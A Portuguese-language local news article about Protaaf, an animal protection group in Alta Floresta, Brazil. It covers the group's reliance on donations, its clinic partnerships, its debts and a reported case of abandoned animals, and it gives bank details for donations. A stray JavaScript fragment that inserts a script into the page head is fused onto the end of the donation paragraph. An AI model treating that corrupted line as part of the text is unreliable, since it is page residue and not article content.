Capa / Cidades / Protaaf já ajudou mais de 5 mil animais, e precisa de doações para continuar

Protaaf já ajudou mais de 5 mil animais, e precisa de doações para continuar

OPADionéia Martins

O Protaaf – Protetores de Animais de Alta Floresta, é uma associação que ama e protege os animais. Criada em 2010 por um grupo de amigos que tem o mesmo objetivo, a entidade vive exclusivamente da doação dos moradores e empresários do município.
Para se manter ou quitar as dívidas que são contraídas com as clínicas veterinárias que contribuem com a causa, a Protaaf realiza campanhas, são rifas, pizzas e doações por meio da conta no banco ou nos cofrinhos que são deixados nos estabelecimentos comerciais.
“Hoje a Protaaf funciona até o momento com a ajuda da população, nesses 5, 6 anos o que a gente tem conseguido caminhar, foi graças a população por isso a gente é muito grato aos moradores de Alta Floresta pela dedicação aos apelos que fazemos por meio da internet ou pelos meios de comunicação”, pontua o Presidente do Protaaf, José Aparecido de Souza,
Embora a associação tenha buscado convênios com o poder público, ainda não foi possível estabelecer uma parceria, mas a iniciativa privada tem abrido as portas ajudado a associação a continuar na ativa.
“Da iniciativa pública não temos nenhum ajuda financeira, já protoco-lamos projetos no Ministério do Trabalho pra nos ajudar nessa questão mas ainda não conseguimos”, disse José Aparecido.
Como parte do incentivo as clínicas veterinárias fazem todo o tratamento dos animais recolhidos com um preço reduzido. Graças a essas parcerias é que a Protaaf está conseguindo se manter.
“A Animed tem abrido as portas, no início a clínica S.O.S. era quem nos ajudava e até hoje de vez em quando ajuda dentro das possibilidades, a Pet Vida tem ajudado muito”, pontua Aparecido.
O presidente estima que nos 5 anos a associação tenha ajudado mais de 5 mil animais, e que já foi investido aproximadamente R$ 300 mil no tratamento clínico e ração, e tudo com a contribuição da população de Alta Floresta que é solidária com a causa.
Os animais resgatados são vítimas de maus tratos e atropelamento. Alguns precisam passar por tratamento cirúrgico, outros de medicação com custo alto. “São vários casos de animais em grandes casos de penúria, a gente tem atendido na rua, alguns foram resgatados, acidentes, as doenças, transmissíveis entre eles, que é a TVT que é um tipo de câncer e o custo do tratamento é muito caro”, alerta.
Atualmente a Protaaf acumula dívidas em torno de R$ 3 mil, e conta com a ajuda da população para quitar os débitos e ainda para continuar a ajudar os animais que sofrem maus tratos e/ou são abandonados pelos donos.
No sábado, 30, a nossa redação flagrou um caso de abandono na Avenida Paulo Pires, próximo ao Lar dos Idosos. Dois animais foram abandonados e deixados amarrados no local, visivelmente debilitados e com feridas no corpo os animais não consegues nem sair do local, os dois estão expostos ao sol e chuva e depende da caridade de alguém para acolher e tratá-los.
Casos como estes é que fazem com que a Protaaf contraia dívidas. Quem não pode acolher um animal pode ajudar a associação nessa missão, basta procurar a clínica Animed e fazer a doação, depositando nos cofrinhos nos estabelecimentos comerciais ou no banco, na agência 1385 Op. 003 conta 1171-3 na Caixa Econômica Federal.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top